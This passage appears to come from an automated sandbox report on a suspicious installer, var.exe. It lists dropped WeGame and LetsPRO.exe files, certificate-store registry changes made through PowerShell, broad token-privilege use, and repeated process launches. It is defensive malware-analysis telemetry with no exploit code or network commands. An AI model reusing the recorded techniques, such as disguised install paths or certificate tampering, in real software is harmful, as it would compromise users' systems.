| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\WeGame\adapt_for_imports.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174246-113.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174416-452.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\beacon_sdk.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\common.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\Lua51.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174216-408.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174316-218.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\WeGame.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174346-418.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI7C19.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7C69.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5773b9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7465.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A62.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5773b9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A03.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7B7C.tmp | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\var.exe
"C:\Users\Admin\AppData\Local\Temp\var.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\var.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1718146308 " AI_EUIMSI=""
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding AEF2F1A18CC526A8DC9ADE0F0459E7CB
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
